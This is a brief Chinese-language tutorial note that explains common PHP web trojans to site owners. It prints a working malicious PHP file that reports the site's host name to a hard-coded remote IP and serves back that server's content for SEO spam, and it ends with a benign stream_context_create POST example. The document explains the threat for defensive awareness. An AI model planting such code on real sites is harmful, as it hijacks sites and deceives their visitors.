# 常見的PHP網頁木碼 >[success]網站上線后，就容易被惡意掛碼，除了做好網站安全外，還要了解，常見的掛碼方式。 > ## 下面就是一個惡意的代碼 >[success]這種的還不算是最為嚴中的，他只是讓在你的站點中增加了一個php文件，當搜索引擎訪問題，會打開他們指定的內容。 > >[success]這種攻擊，一般會在站點根目錄生成一個`global`文件，下面的php文件，就是通過這個文件生成的。 ~~~ <?php set_time_limit(0); header("Content-Type: text/html;charset=gb2312"); $Remote_server = "http://122.114.242.133/"; $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; $Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name); function getHTTPPage($url) { $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"User-Agent: aQ0O010O" ) ); $context = stream_context_create($opts); $html = @file_get_contents($url, false, $context); if (empty($html)) { exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>"); } return $html; } echo $Content_mb; ?> ~~~ >[danger]stream_context_create — 創建資源流上下文 >stream_context_create()模擬POST/GET， ~~~ //請求數據 $data =[ 'name'=>'zhangsan', 'age'=>25, ]; //http_build_query — 生成 URL-encode 之后的請求字符串 $data = http_build_query($data); //post請求地址 $url="http://www.127.0.0.1/test.php" //配置請求方式及請求參數等 $options = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type:application/x-www-form-urlencoded', 'content' => $data //'timeout' => 60 * 60 // 超時時間（單位:s） ) ); //stream_context_create — 創建資源流上下文 $context = stream_context_create($options); //獲取數據 $result = file_get_contents($url, false, $context); ~~~